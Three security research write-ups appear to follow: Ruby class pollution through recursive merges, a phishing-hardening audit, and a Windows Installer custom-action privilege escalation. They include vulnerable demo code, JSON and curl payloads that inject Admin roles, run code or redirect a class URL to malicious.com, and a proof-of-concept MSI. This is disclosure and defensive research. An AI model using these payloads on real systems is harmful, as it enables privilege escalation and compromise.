Class Pollution in Ruby: A Deep Dive into Exploiting Recursive Merges

Introduction

In this post, we are going to explore a rarely discussed class of vulnerabilities in Ruby, known as class pollution. This concept is inspired by the idea of prototype pollution in JavaScript, where recursive merges are exploited to poison the prototype of objects, leading to unexpected behaviors. This idea was initially discussed in a blog post about prototype pollution in Python, in which the researcher used recursive merging to poison class variables and eventually global variables via the __globals__ attribute.

In Ruby, we can categorize class pollution into three main cases:

  1. Merge on Hashes: In this scenario, class pollution isn’t possible because the merge operation is confined to the hash itself.

  2. Merge on Attributes (Non-Recursive): Here, we can poison the instance variables of an object, potentially replacing methods by injecting return values. This pollution is limited to the object itself and does not affect the class.

current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
  3. Merge on Attributes (Recursive): In this case, the recursive nature of the merge allows us to escape the object context and poison attributes or methods of parent classes or even unrelated classes, leading to a broader impact on the application.
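
As a quick illustration of case 1, merging untrusted keys into a plain Hash only creates hash entries; it cannot shadow methods:

```ruby
# Case 1: a merge on a plain Hash is confined to the hash itself
h = { "name" => "John" }
merged = h.merge({ "to_s" => "Admin" })

merged["to_s"]   # => "Admin" -- just an ordinary key/value pair
merged.to_s      # still the normal Hash#to_s, not "Admin"
```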

Merge on Attributes

Let’s start by examining a code example where we exploit a recursive merge to modify object methods and alter the application’s behavior. This type of pollution is limited to the object itself.

require 'json'


# Base class for both Admin and Regular users
class Person

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  # Authorize based on the `to_s` method result
  def authorize
    if to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

  # Health check that executes all protected methods using `instance_eval`
  def health_check
    protected_methods().each do |method|
      instance_eval(method.to_s)
    end
  end

  private

  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|

      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end

  protected

  def check_cpu
    puts "CPU check passed."
  end

  def check_memory
    puts "Memory check passed."
  end
end

# Admin class inherits from Person
class Admin < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end

  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )


    # Perform a recursive merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize

    # Execute health check (RCE vulnerability)
    # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.health_check

  end
end

if ARGV.length != 1
  puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we perform a recursive merge on the attributes of the User object. This allows us to inject or override values, potentially altering the object’s behavior without directly modifying the class definition.

How It Works:

  1. Initialization and Setup:
    • The User object is initialized with specific attributes: name, age, and details. These attributes are stored as instance variables within the object.
  2. Merge:
    • The merge_with method is called with a JSON input that represents the additional data to be merged into the User object.
  3. Altering Object Behavior:
    • By passing carefully crafted JSON data, we can modify or inject new instance variables that affect how the User object behaves.
    • For example, in the authorize method, the to_s method determines whether the user is granted admin privileges. By injecting a new to_s method with a return value of "Admin", we can escalate the user’s privileges.
    • Similarly, in the health_check method, we can inject arbitrary code execution by overriding methods that are called via instance_eval.

Example Exploits:

  • Privilege Escalation: ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    • This injects a to_s attribute that returns "Admin", granting the user unauthorized admin privileges.
  • Remote Code Execution: ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    • This injects a new entry into the protected_methods list, which is then executed by instance_eval, allowing arbitrary code execution.

Class Pollution Gadgets

Limitations:

  • The aforementioned changes are limited to the specific object instance and do not affect other instances of the same class. This means that while the object’s behavior is altered, other objects of the same class remain unaffected.
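
This instance-only scope is easy to verify with a reduced sketch (the Victim class name is illustrative, not from the code above):

```ruby
# Reduced sketch: singleton-class pollution affects a single instance only
class Victim
  def role
    "user"
  end
end

a = Victim.new
b = Victim.new

# What the merge does for a leaf value on object `a`
a.instance_variable_set("@role", "admin")
a.singleton_class.attr_accessor :role

a.role  # => "admin" -- the singleton accessor shadows the method
b.role  # => "user"  -- other instances keep the original method
```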

This example highlights how seemingly innocuous operations like recursive merges can be leveraged to introduce severe vulnerabilities if not properly managed. By understanding these risks, developers can better protect their applications from such exploits.

Real-World Cases

Next, we’ll explore two of the most popular libraries for performing merges in Ruby and see how they might be vulnerable to class pollution. It’s important to note that other libraries are potentially affected by this class of issues, and the overall impact of these vulnerabilities varies.

1. ActiveSupport’s deep_merge

ActiveSupport, a built-in component of Ruby on Rails, provides a deep_merge method for hashes. By itself, this method isn’t exploitable given it is limited to hashes. However, if used in conjunction with something like the following, it could become vulnerable:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
  merged_hash = to_h.deep_merge(other_object)

  merged_hash.each do |key, value|
    self.class.attr_accessor key
    instance_variable_set("@#{key}", value)
  end

  self
end

In this example, if the deep_merge is used as shown, we can exploit it similarly to the first example, leading to potentially dangerous changes in the application’s behavior.
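
For reference, a hash-level deep_merge behaves roughly like this gem-free sketch; the danger only appears once the merged hash is written back into instance variables as shown above:

```ruby
# Gem-free approximation of a hash-level deep_merge
def deep_merge(a, b)
  a.merge(b) do |_key, old_val, new_val|
    if old_val.is_a?(Hash) && new_val.is_a?(Hash)
      deep_merge(old_val, new_val)
    else
      new_val
    end
  end
end

result = deep_merge({ "a" => { "b" => 1 } }, { "a" => { "c" => 2 }, "d" => 3 })
# result == { "a" => { "b" => 1, "c" => 2 }, "d" => 3 }
```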

Active Support Class Pollution

2. Hashie

The Hashie library is widely used for creating flexible data structures in Ruby, offering features such as deep_merge. However, unlike the previous example with ActiveSupport, Hashie’s deep_merge method operates directly on object attributes rather than plain hashes. This makes it more susceptible to attribute poisoning.

Hashie has a built-in mechanism that prevents the direct replacement of methods with attributes during a merge. Normally, if you try to override a method with an attribute via deep_merge, Hashie will block the attempt and issue a warning. However, there are specific exceptions to this rule: attributes that end with _, !, or ? can still be merged into the object, even if they conflict with existing methods.

Key Points

  1. Method Protection: Hashie prevents attributes from directly overriding existing methods. Keys that end in _, !, or ? are still accepted during a merge, but they do not replace the corresponding method: for example, merging a to_s_ attribute will not raise an error, yet the to_s method keeps its original behavior. This protection mechanism is crucial to maintaining the integrity of methods in Hashie objects.

  2. Special Handling of _: The key vulnerability lies in the handling of _ as an attribute on its own. In Hashie, when you access _, it returns a new Mash object (essentially a temporary object) of the class you are interacting with. This behavior allows attackers to access and work with this new Mash object as if it were a real attribute. While methods cannot be replaced, this feature of accessing the _ attribute can still be exploited to inject or modify values.

    For example, by injecting "_": "Admin" into the Mash, an attacker could trick the application into accessing the temporary Mash object created by _, and this object can contain maliciously injected attributes that bypass protections.

A Practical Example

Consider the following code:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

  # Method to merge additional data into the object using hashie
  def merge_with(other_object)
    deep_merge!(other_object)
    self
  end

  # Authorize based on to_s
  def authorize
    if _.to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
    else
      puts "Access denied: #{@name} is not an admin."
    end
  end

end

# Admin class inherits from Person
class Admin < Person
  def to_s
    "Admin"
  end
end

# Regular user class inherits from Person
class User < Person
  def to_s
    "User"
  end
end

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new({
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    })

    # Perform a deep merge, which could override methods
    user.merge_with(additional_object)

    # Authorize the user (privilege escalation vulnerability)
    # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
    # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
    user.authorize
  end
end

if ARGV.length != 1
  puts "Usage: ruby hashie.rb 'JSON_STRING'"
  exit
end

json_input = ARGV[0]
JSONMergerApp.run(json_input)

In the provided code, we are exploiting Hashie’s handling of _ to manipulate the behavior of the authorization process. When _.to_s is called, instead of returning the method-defined value, it accesses a newly created Mash object, where we can inject the value "Admin". This allows an attacker to bypass method-based authorization checks by injecting data into the temporary Mash object.

For example, the JSON payload {"_": "Admin"} injects the string “Admin” into the temporary Mash object created by _, allowing the user to be granted admin access through the authorize method even though the to_s method itself hasn’t been directly overridden.

This vulnerability highlights how certain features of the Hashie library can be leveraged to bypass application logic, even with protections in place to prevent method overrides.

Hashie Support Class Pollution

Escaping the Object to Poison the Class

When the merge operation is recursive and targets attributes, it’s possible to escape the object context and poison attributes or methods of the class, its parent class, or even other unrelated classes. This kind of pollution affects the entire application context and can lead to severe vulnerabilities.

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
  @@url = "http://default-url.com"

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details
  end

  def self.url
    @@url
  end

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)
  end

  private

  # Recursive merge to modify instance variables
  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
        else
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        end
      else
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key
      end
    end
    original
  end
end

class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)
  end
end

# A class created to simulate signing with a key, to be infected with the third gadget
class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key
    @@signing_key
  end

  def sign(signing_key, data)
    "#{data}-signed-with-#{signing_key}"
  end
end

class JSONMergerApp < Sinatra::Base
  # POST /merge - Infects class variables using JSON input
  post '/merge' do
    content_type :json
    json_input = JSON.parse(request.body.read)

    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"
        }
      }
    )

    user.merge_with(json_input)

    { status: 'merged' }.to_json
  end

  # GET /launch-curl-command - Activates the first gadget
  get '/launch-curl-command' do
    content_type :json

    # This gadget makes an HTTP request to the URL stored in the User class
    if Person.respond_to?(:url)
      url = Person.url
      response = Net::HTTP.get_response(URI(url))
      { status: 'HTTP request made', url: url, response_body: response.body }.to_json
    else
      { status: 'Failed to access URL variable' }.to_json
    end
  end

  # Curl command to infect User class URL:
  # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

  # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
  get '/sign_with_subclass_key' do
    content_type :json

    # This gadget signs data using the signing key stored in KeySigner class
    signer = KeySigner.new
    signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

    { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
  end

  # Curl command to infect KeySigner signing key (run in a loop until successful):
  # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

  # GET /check-infected-vars - Check if all variables have been infected
  get '/check-infected-vars' do
    content_type :json

    {
      user_url: Person.url,
      signing_key: KeySigner.signing_key
    }.to_json
  end

  run! if app_file == $0
end

In the example above, we demonstrate two distinct types of class pollution:

  1. (A) Poisoning the Parent Class: By recursively merging attributes, we can modify variables in the parent class. This modification impacts all instances of that class and can lead to unintended behavior across the application.

  2. (B) Poisoning Other Classes: By brute-forcing subclass selection, we can eventually target and poison specific classes. This approach involves repeatedly attempting to poison random subclasses until the desired one is infected. While effective, this method can cause issues due to the randomness and potential for over-infection.

Detailed Explanation of Both Exploits

(A) Poisoning the Parent Class

In this exploit, we use a recursive merge operation to modify the @@url variable in the Person class, which is the parent class of User. By injecting a malicious URL into this variable, we can manipulate subsequent HTTP requests made by the application.

For example, using the following curl command:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

We successfully poison the @@url variable in the Person class. When the /launch-curl-command endpoint is accessed, it now sends a request to http://malicious.com instead of the original URL.

This demonstrates how recursive merges can escape the object level and modify class-level variables, affecting the entire application.
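
Written out step by step, the `{"class":{"superclass":{"url":...}}}` payload drives the recursive merge through the following traversal (a reduced sketch with minimal stand-in classes):

```ruby
# Reduced stand-ins for the article's classes
class Person
  @@url = "http://default-url.com"

  def self.url
    @@url
  end
end

class User < Person; end

user = User.new

# "class" and "superclass" are readable methods, so the recursive merge
# walks user -> User -> Person before assigning the leaf key
target = user.public_send("class").public_send("superclass")  # => Person

# The leaf assignment: set @url on the Person class object itself and
# redefine Person.url via its singleton class, shadowing the original method
target.instance_variable_set("@url", "http://malicious.com")
target.singleton_class.attr_accessor :url

Person.url  # => "http://malicious.com"
```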

Class Pollution Curl Gadget

(B) Poisoning Other Classes

This exploit leverages brute-force to infect specific subclasses. By repeatedly attempting to inject malicious data into random subclasses, we can eventually target and poison the KeySigner class, which is responsible for signing data.

For example, using the following looped curl command:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

We attempt to poison the @@signing_key variable in KeySigner. After several attempts, the KeySigner class is infected, and the signing key is replaced with our injected key.

This exploit highlights the dangers of recursive merges combined with brute-force subclass selection. While effective, this method can cause issues due to its aggressive nature, potentially leading to the over-infection of classes.
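
To make the brute-force step concrete, here is a reduced sketch of the gadget chain. Class#subclasses requires Ruby 3.1+, and because the real payload uses sample, we select KeySigner deterministically here instead of relying on chance:

```ruby
class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key
    @@signing_key
  end
end

# Object.subclasses (Ruby >= 3.1) is what the payload's "subclasses" key
# resolves to; "sample" then picks one at random, hence the request loop.
victim = Object.subclasses.find { |c| c == KeySigner }

victim.instance_variable_set("@signing_key", "injected-signing-key")
victim.singleton_class.attr_accessor :signing_key

KeySigner.signing_key  # => "injected-signing-key"
```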

Class Pollution Sign Gadget

In the latter examples, we set up an HTTP server to demonstrate how the infected classes remain poisoned across multiple HTTP requests. The persistent nature of these infections shows that once a class is poisoned, the entire application context is compromised, and all future operations involving that class will behave unpredictably.

The server setup also allowed us to easily check the state of these infected variables via specific endpoints. For example, the /check-infected-vars endpoint outputs the current values of the @@url and @@signing_key variables, confirming whether the infection was successful.

This approach clearly shows how class pollution in Ruby can have lasting and far-reaching consequences, making it a critical area to secure.

Conclusion

The research conducted here highlights the risks associated with class pollution in Ruby, especially when recursive merges are involved. These vulnerabilities are particularly dangerous because they allow attackers to escape the confines of an object and manipulate the broader application context. By understanding these mechanisms and carefully considering how data merges are handled, it is possible to mitigate the risk of class pollution in Ruby applications.

We’re hiring!

We are a small highly focused team. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security. If you’ve enjoyed this research, consider applying via our careers portal to spend up to 11 weeks/year on research projects like this one!


Applying Security Engineering to Make Phishing Harder - A Case Study

Introduction

Recently Doyensec was hired by a client offering a “Communication Platform as a Service”. This platform allows their clients to craft a customer service experience and to communicate with their own customers via a plethora of channels: email, web chats, social media and more.

While undoubtedly valuable, such a service introduces a unique threat model. Our client’s users work with a vast amount of incoming correspondence from outside (often anonymous) users, on a daily basis. This makes them particularly vulnerable to phishing and other social engineering attacks.

While such threats cannot be fully eliminated, it is possible to minimize the opportunities for exploitation. Recognizing this, Doyensec was hired to perform a security review specifically focused on social engineering attacks, and phishing in particular. The engagement, performed earlier this year, proved extremely valuable for both parties. Most importantly, our client used the results to greatly increase their platform’s resilience against social engineering attacks. Additionally, Doyensec engineers had a great opportunity to unleash their creativity on bugs that are often overlooked, or at least heavily undervalued (looking at you, CVSS score!), during standard security audits, as well as the opportunity to look at defending the application from a blue-team perspective.

The following case study will discuss some of the vulnerabilities that were addressed as part of this audit. Hopefully, this post will be useful for developers to understand what kind of vulnerabilities can be lurking in their platforms too. It also helps to demonstrate how valuable such focused engagements can be as an addition to standard web engagements.

Attachments Handling

For any customer support organization, file attachment management is a crucial feature. On one hand, users need to be able to share file samples, screenshots, etc. with their interlocutors. On the other hand, accepting files from untrusted parties is always a hotbed for all manner of security bugs. Therefore, hardening this part of the application requires careful consideration of how to ensure confidentiality and integrity without sacrificing usability.

File Extension Restriction Bypass via Trailing Period

The tested platform employs a robust system designed to validate allowed file extensions and content types for file uploads, featuring a global ban list for inherently dangerous file types, such as executables (e.g., .exe). These measures are intended to prevent the uploading and distribution of potentially malicious files. However, by exploiting some browsers’ quirks, a vulnerability was discovered that allowed users to bypass these restrictions simply by appending a trailing period (“dangling dot”) to the file extension.

It was possible to bypass this file extension restriction by crafting an upload request with a prohibited extension, such as .exe.. This resulted in the system accepting the file, since it ostensibly met the criteria for allowed uploads - which included an empty extension. However, Firefox and Chromium-based browsers remove the dangling dot (interestingly, Safari retains it). As a result, the file was saved with an original .exe extension on the victim’s filesystem:

Dangling Dot Download Result

The recommendation here is simple: trailing dots should be stripped from filenames. They rarely have any use in real-world scenarios, so the usability tradeoff is minimal.
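
A sanitization sketch (the helper name is illustrative, not from the platform's codebase):

```ruby
# Strip any trailing dots before running extension checks
def sanitized_filename(name)
  name.sub(/\.+\z/, "")
end

sanitized_filename("payload.exe.")  # => "payload.exe"
sanitized_filename("report.pdf")    # => "report.pdf" (unchanged)
```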

Circumvention of Content Origin Restrictions via Subdomain Crafting

Platform chats have been created with a restriction, which allows link attachments from our client’s subdomains only. This security control is designed to restrict uploads and references to images and attachments to a predefined set of origins, preventing the use of external sources that could be employed in phishing attacks. The intended validation process relies on an allowlist of domains.

However, when validating (sub)domains using regular expressions, it’s easy to forget the intricacies of this syntax, which can lead to hard-to-spot bypasses.

Doyensec observed that subdomains were matched using an allowlist of regular expressions similar to /acme-attachments-1.com/. Such a regular expression does not enforce the beginning and the end of the string and will therefore accept any domains that contain the desired subdomain. An attacker could create a subdomain similar to acme-attachments-1.com.doyensec.com, which would be accepted despite this security mechanism.

Another common (although not exploitable in this case) mistake is forgetting that the dot (.) character is treated as a wildcard by regular expressions. When one forgets to escape a dot in a domain regex, an attacker can register a domain which will bypass such a restriction. For instance, a regular expression similar to downloads.acmecdn.com would accept an attacker-controlled domain like downloadsAacmecdn.com.
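
Both pitfalls can be seen side by side in Ruby (the domains are the article's examples):

```ruby
# Unanchored pattern: matches anywhere inside the attacker's hostname
loose = /acme-attachments-1\.com/
loose.match?("acme-attachments-1.com.doyensec.com")   # => true (bypass)

# Unescaped dot: "." matches any single character
wild = /downloads.acmecdn\.com/
wild.match?("downloadsAacmecdn.com")                  # => true (bypass)

# Anchored and fully escaped: only the exact domain passes
strict = /\Aacme-attachments-1\.com\z/
strict.match?("acme-attachments-1.com.doyensec.com")  # => false
strict.match?("acme-attachments-1.com")               # => true
```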

It is worth noting that as innocuous as this vulnerability seems to be, it actually has great potential for creating successful phishing attacks. When a victim receives an attachment in a trusted platform, they’re far more likely to follow the link. Also, a login page would not be surprising for a victim, further increasing the likelihood of them giving away their credentials.

Antivirus Scan Bypass

The platform appropriately implements antivirus scanning on all incoming files. However, an attacker could obfuscate the true content of the payload by creating an encrypted archive: $ zip -e test_encrypted.zip eicar.com.

There is no simple solution to solve this issue. Banning encrypted archives altogether is a usability trade-off that might be unacceptable in some cases. Doyensec recommended clearly warning users against opening encrypted files at the very least. It might be also useful to allow the clients to choose which side of this trade-off is acceptable for them by creating a proper configuration switch.

HTML Input Handling

When it comes to exchanging messages, it can be very useful to add formatting and give users more ways of expressing themselves. On the other hand, when messages are coming from untrusted sources, such a feature can enable attackers to craft sophisticated attacks that involve UI redressing, e.g., emulating UI elements within their messages.

Our client has found a great way to balance usability and security. While trusted users have a rich choice of input formatting options, untrusted users from outside the platform can only share basic plain-text messages. It is also worth noting that even trusted users can’t inject arbitrary HTML into their messages, given that HTML tags are properly parsed and encoded. There are, however, specific tags that are allowed and, in some cases, converted into more elaborate elements (e.g., link tags get converted into buttons).

Doyensec found this solution well-architected at the design level. However, due to an oversight in the implementation, the public messaging API also accepted a “hidden” (not used by the frontend) parameter which allowed some HTML elements. Doyensec was able to exploit the conversion of links into buttons to demonstrate the potential for UI elements to be spoofed using this vulnerability.

HTML Injection Body Parameter

The issue was resolved by completely disabling this parameter in the public API, only allowing authenticated users to format their messages.

Links Presentation Bugs

Data presentation bugs are an especially overlooked threat. Despite their potential to manipulate or distort critical information, they are frequently underestimated in security assessments and deprioritized in remediation efforts. However, their exploitation can lead to serious consequences, including phishing.

Misleading Unicode Domain Rendering

To understand this issue, it is important to understand two different terms. First, Punycode: a character encoding scheme used to represent Unicode characters in domain names, enabling browsers and other web clients to handle Unicode in domain names. Second, homoglyphs: characters that look very similar to each other but have different codes. While visually indistinguishable, the characters ‘a’ (code: 0x61) and ‘а’ (code: 0x430) are actually two different characters, leading to two different domains when used in a URL.

One of the most prominent examples of this threat was created by the researcher Xudong Zheng, who crafted a link that looks deceptively similar to the widely trusted www.apple.com domain. However, the link https://www.аррӏе.com actually resolves to www.xn--80ak6aa92e.com after unrolling the Punycode string. Visiting the link reveals that it is not controlled by Apple, despite its convincing appearance:

Example Punycode Domain Screenshot

To protect users from these types of issues, we recommended rendering Unicode domains in Punycode format. This way, users are not deceived about where a given link leads.

URI and Filename Spoofing via RTLO Injection

Using the Right-To-Left Override (RTLO) character is another technique for manipulating the way links are displayed. The RTLO character changes the order in which consecutive characters are rendered. When it comes to filenames and URLs, their structures are fixed and the character order matters. Therefore, flipping the character order is an effective way of obscuring the true target of the link, or the extension of a file.

Sound complicated? An example will clear it up. Consider a link to an attacker-controlled domain: https://gepj.net/selif#/moc.rugmi. It looks suspicious; however, when prepended with the RTLO Unicode character ([U+202E]https://gepj.net/selif#/moc.rugmi), it renders in the following way:

Example RTLO Domain

Displayed file extensions can be manipulated in a similar manner:

Consider a file named test.[U+202E]fdp.zip:

Example RTLO Filename

The proposed solution here is simple - stricter filtering. URLs should not be rendered as links when the character order is changed. Similarly, filenames containing character flow manipulators should be rejected.
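
A detection sketch for directional override characters; the exact deny-set below is our assumption of a reasonable filter, not the platform's implementation:

```ruby
# Unicode bidi control characters commonly abused for RTLO spoofing
BIDI_CONTROLS = /[\u202A-\u202E\u2066-\u2069]/

def suspicious_text?(text)
  text.match?(BIDI_CONTROLS)
end

suspicious_text?("test.\u202Efdp.zip")    # => true  (RTLO-spoofed name)
suspicious_text?("quarterly-report.pdf")  # => false
```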

Even when links are always properly displayed, there still remains a chance that an attacker can mount a successful phishing campaign. After all, users can always be coerced into following a malicious link. Such a risk cannot be fully eliminated, but it can be mitigated with additional hardening. The examined platform implements navigation confirmation interstitials: any time a user follows a link outside of the platform, an additional confirmation screen appears. Such UI elements inform users that they are leaving a safe environment, greatly decreasing the chances of a successful phishing attack.

Summary

This project is a great example of a proactive engagement against specific threats. Given the particular threat model of this platform, such an engagement has proven extremely useful as an addition to regular security assessments and their bug bounty program. In particular, an engagement specifically focused on phishing and social engineering allowed us to craft a list of recommendations and hardening ideas that would have otherwise just been a side note in a regular security review.


Windows Installer, Exploiting Custom Actions

Over a year ago, I published my research around the Windows Installer Service. The article explained in detail how the MSI repair process executes in an elevated context, but the lack of impersonation could lead to Arbitrary File Delete and similar issues. The issue was acknowledged by Microsoft (as CVE-2023-21800), but it was never directly fixed. Instead, the introduction of a Redirection Guard mitigated all symlink attacks in the context of the msiexec process. Back then, I wasn’t particularly happy with the solution, but I couldn’t find any bypass.

The Redirection Guard turned out to work exactly as intended, so I spent some time attacking the Windows Installer Service from other angles. Some bugs were found (CVE-2023-32016), but I always felt that the way Microsoft handled the impersonation issue wasn’t exactly right. That unfixed behavior became very useful during another round of research.

This article describes an unpatched vulnerability affecting the latest Windows 11 versions and illustrates how the issue can be leveraged to elevate a local user’s privileges. The bug submission was closed as non-reproducible after half a year of processing, so I will demonstrate how anyone can reproduce the issue.

Custom Actions

Custom Actions in the Windows Installer world are user-defined actions that extend the functionality of the installation process. Custom Actions are necessary in scenarios where the built-in capabilities of Windows Installer are insufficient. For example, if an application requires specific registry keys to be set dynamically based on the user’s environment, a Custom Action can be used to achieve this. Another common use case is when an installer needs to perform complex tasks like custom validations or interactions with other software components that cannot be handled by standard MSI actions alone.

Overall, Custom Actions can be implemented in different ways, such as:

  • Compiled to custom DLLs using the exposed C/C++ API
  • Inline VBScript or JScript snippets within the WXS file
  • Explicitly calling system commands within the WXS file

All of the above methods are affected, but for simplicity, we will focus on the last type.

Let’s take a look at an example WXS file (poc.wxs) containing some Custom Actions:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
    <Product Id="{12345678-9259-4E29-91EA-8F8646930000}" Language="1033" Manufacturer="YourCompany" Name="HelloInstaller" UpgradeCode="{12345678-9259-4E29-91EA-8F8646930001}" Version="1.0.0.0">
        <Package Comments="This installer database contains the logic and data required to install HelloInstaller." Compressed="yes" Description="HelloInstaller" InstallerVersion="200" Languages="1033" Manufacturer="YourCompany" Platform="x86" ReadOnly="no" />

        <CustomAction Id="SetRunCommand" Property="RunCommand" Value="&quot;[%USERPROFILE]\test.exe&quot;" Execute="immediate" />
        <CustomAction Id="RunCommand" BinaryKey="WixCA" DllEntry="WixQuietExec64" Execute="commit" Return="ignore" Impersonate="no" />
        <Directory Id="TARGETDIR" Name="SourceDir">
            <Directory Id="ProgramFilesFolder">
                <Directory Id="INSTALLFOLDER" Name="HelloInstaller" ShortName="krp6fjyg">
                    <Component Id="ApplicationShortcut" Guid="{12345678-9259-4E29-91EA-8F8646930002}" KeyPath="yes">
                        <CreateFolder Directory="INSTALLFOLDER" />
                    </Component>
                </Directory>
            </Directory>
        </Directory>
        <Property Id="ALLUSERS" Value="1" />
        <Feature Id="ProductFeature" Level="1" Title="Main Feature">
            <ComponentRef Id="ApplicationShortcut" />
        </Feature>
        <MajorUpgrade DowngradeErrorMessage="A newer version of [ProductName] is already installed." Schedule="afterInstallValidate" />

        <InstallExecuteSequence>
            <Custom Action="SetRunCommand" After="InstallInitialize">1</Custom>
            <Custom Action="RunCommand" After="SetRunCommand">1</Custom>
        </InstallExecuteSequence>
    </Product>
</Wix>

This looks like a perfectly fine WXS file. It defines the InstallExecuteSequence, which consists of two custom actions. The SetRunCommand is queued to run right after the InstallInitialize event. Then, the RunCommand should start right after SetRunCommand finishes.

The SetRunCommand action simply sets the value of the RunCommand property. The [%USERPROFILE] string will be expanded to the path of the current user’s profile directory. This is achieved by the installer using the value of the USERPROFILE environment variable. The expansion process involves retrieving the environment variable’s value at runtime and substituting [%USERPROFILE] with this value.

The second action, also called RunCommand, uses the RunCommand property and executes it by calling the WixQuietExec64 method, which is a great way to execute the command quietly and securely (without spawning any visible windows). The Impersonate="no" option enables the command to execute with LocalSystem’s full permissions.

On a healthy system, the administrator’s USERPROFILE directory cannot be accessed by any less privileged users. Whatever file is executed by the RunCommand shouldn’t be directly controllable by unprivileged users.

We covered a rather simple example. Implementing Custom Actions correctly is actually quite complicated, and there are many mistakes that can be made. The actions may rely on untrusted resources, spawn hijackable console instances, or run with more privileges than necessary. These dangerous mistakes may be covered in future blog posts.

Testing the Installer

Having the WiX Toolset at hand, we can turn our XML into an MSI file. Note that we need to enable the additional WixUtilExtension to use the WixCA:

candle .\poc.wxs 
light .\poc.wixobj -ext WixUtilExtension.dll

The poc.msi file should be created in the current directory.

According to our WXS file above, once the installation is initialized, our Custom Action should run the "[%USERPROFILE]\test.exe" file. We can set up a ProcMon filter to look for that event. Remember to also enable the “Integrity” column.

Procmon filters settings

We can install the application using any Admin account (the Almighty user here):

msiexec /i C:\path\to\poc.msi

ProcMon should record the CreateFile event. The file was not there, so additional file extensions were tried.

NAME NOT FOUND event for the almighty user

The same sequence of actions can be reproduced by running an installation repair process. The command can point at the specific C:\Windows\Installer\*.msi file or use the GUID that we defined in the WXS file:

msiexec /fa {12345678-9259-4E29-91EA-8F8646930000}

The result should be exactly the same if the Almighty user triggered the repair process.

On the other hand, note what happens if the installation repair was started by another unprivileged user: lowpriv.

NAME NOT FOUND event for the lowpriv user

It is the user’s environment that sets the executable path, but the command still executes with System level integrity, without any user impersonation! This leads to a straightforward privilege escalation.

As a final confirmation, the lowpriv user would plant an add-me-as-admin type of payload under the C:\Users\lowpriv\test.exe path. The installation process will not finish until test.exe exits, but handling that behavior is rather trivial.
